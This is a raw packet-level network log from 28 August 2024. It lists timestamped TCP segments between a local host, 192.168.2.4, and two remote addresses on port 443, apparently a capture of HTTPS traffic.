                                                          Aug 28, 2024 00:11:12.628160954 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.628448963 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.628456116 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.640963078 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.641257048 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.641268969 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.642689943 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.642759085 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.643049955 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.643134117 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.643212080 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.643218994 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.644309044 CEST44349873188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.644465923 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.644475937 CEST44349873188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.645464897 CEST44349873188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.645541906 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.645768881 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.645832062 CEST44349873188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.645853996 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.656424046 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.657071114 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.673212051 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.688685894 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.688688040 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.688695908 CEST44349873188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.728585958 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.728658915 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.728728056 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.730159044 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.730175018 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.735465050 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.830087900 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.830483913 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.830499887 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.831504107 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.831593990 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.832473993 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.832540989 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.833185911 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.833194017 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.882621050 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.901494980 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.901833057 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.901844025 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.902817011 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.902888060 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.903215885 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.903275013 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.903650999 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.903660059 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.948463917 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.006443977 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.006550074 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.006726027 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.007602930 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.007622957 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.142652988 CEST44349857104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.142729044 CEST44349857104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.142775059 CEST49857443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:13.143383980 CEST49857443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:13.143408060 CEST44349857104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.152452946 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.152487993 CEST44349876188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.152896881 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.154089928 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.154107094 CEST44349876188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158402920 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158467054 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158514977 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158516884 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.158535957 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158629894 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158629894 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.158642054 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158689022 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.158701897 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158786058 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.158904076 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.160538912 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.160589933 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.160631895 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.160638094 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.160654068 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.160702944 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.160710096 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.160752058 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.160828114 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.166393042 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.166407108 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.167715073 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.167727947 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175319910 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175389051 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175429106 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175471067 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175476074 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.175483942 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175513983 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.175559044 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175605059 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175605059 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.175615072 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.175654888 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.176080942 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.224392891 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.224399090 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.244065046 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.244117022 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.244178057 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.244184971 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.244229078 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.262659073 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.262795925 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.262840986 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.262850046 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.263308048 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.263355017 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.263360023 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.263367891 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.263423920 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.264008999 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.264090061 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.264125109 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.264172077 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.264178038 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.264218092 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.264839888 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.264966965 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.265022993 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.267703056 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.267716885 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.274213076 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.274235964 CEST44349877188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.274308920 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.274601936 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.274617910 CEST44349877188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.343929052 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.343976021 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.344038963 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.344041109 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.344053984 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.344110966 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.344116926 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.344122887 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.344165087 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.344239950 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.344296932 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.346169949 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.346177101 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.346184969 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.346263885 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.348504066 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.350064039 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.350091934 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.350141048 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.350151062 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.350198984 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.410774946 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.410825014 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.410856962 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.410891056 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.410902023 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.410918951 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.410943031 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.410954952 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.411230087 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.411261082 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.411272049 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.411279917 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.411302090 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.411320925 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.414069891 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.414078951 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.445321083 CEST49878443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:13.445363998 CEST44349878104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.445425987 CEST49878443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:13.445738077 CEST49878443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:13.445755959 CEST44349878104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.460721970 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.460741043 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.468033075 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.670581102 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670638084 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670666933 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670696974 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670728922 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670725107 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.670752048 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670767069 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.670799017 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670839071 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670846939 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.670857906 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670876026 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.670886040 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670913935 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670953035 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670958042 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.670964956 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.670991898 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671004057 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671029091 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671046019 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671053886 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671084881 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671123028 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671128988 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671137094 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671161890 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671210051 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671237946 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671257973 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671263933 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671483040 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671541929 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671550035 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671550035 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671586037 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671597004 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671626091 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671664000 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671698093 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671708107 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671715975 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671736956 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671758890 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671809912 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671839952 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671854973 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671863079 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671896935 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671907902 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671914101 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671958923 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.671958923 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.671969891 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672004938 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.672008038 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672017097 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672049046 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.672055960 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672091007 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672101021 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.672107935 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672132969 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672156096 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.672163963 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672194004 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672209024 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.672215939 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.672255039 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.672261000 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.674082994 CEST44349876188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676014900 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676054955 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676085949 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676115990 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.676119089 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676130056 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676155090 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.676187038 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.676193953 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676312923 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676354885 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676373005 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.676379919 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676428080 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.676593065 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676632881 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676678896 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.676690102 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676721096 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676767111 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.676774025 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676815987 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.676965952 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.676999092 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.677045107 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.677052021 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.677067995 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.677094936 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.677129984 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.677779913 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.677833080 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.677892923 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.677942991 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.678658962 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.678711891 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.678719044 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.678731918 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.678767920 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.678798914 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.689230919 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.689240932 CEST44349876188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.690274000 CEST44349876188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.690349102 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.695878029 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.695944071 CEST44349876188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.696069956 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.696078062 CEST44349876188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.696135998 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.696182966 CEST49876443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.699263096 CEST49879443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.699302912 CEST44349879188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.699387074 CEST49879443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.700747013 CEST49879443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.700766087 CEST44349879188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.702758074 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.702790976 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.703739882 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.703753948 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.737413883 CEST44349877188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.739207983 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.739217043 CEST44349877188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.740278006 CEST44349877188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.740339994 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.742681980 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.742693901 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.742748022 CEST44349877188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.742928028 CEST44349877188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.742989063 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.743321896 CEST49877443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.743330956 CEST44349877188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.743789911 CEST49880443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.743808985 CEST44349880188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.743882895 CEST49880443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.745389938 CEST49880443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.745404959 CEST44349880188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.793545008 CEST49881443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.793562889 CEST44349881188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:13.793622971 CEST49881443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:13.794086933 CEST49882443192.168.2.4188.114.96.3
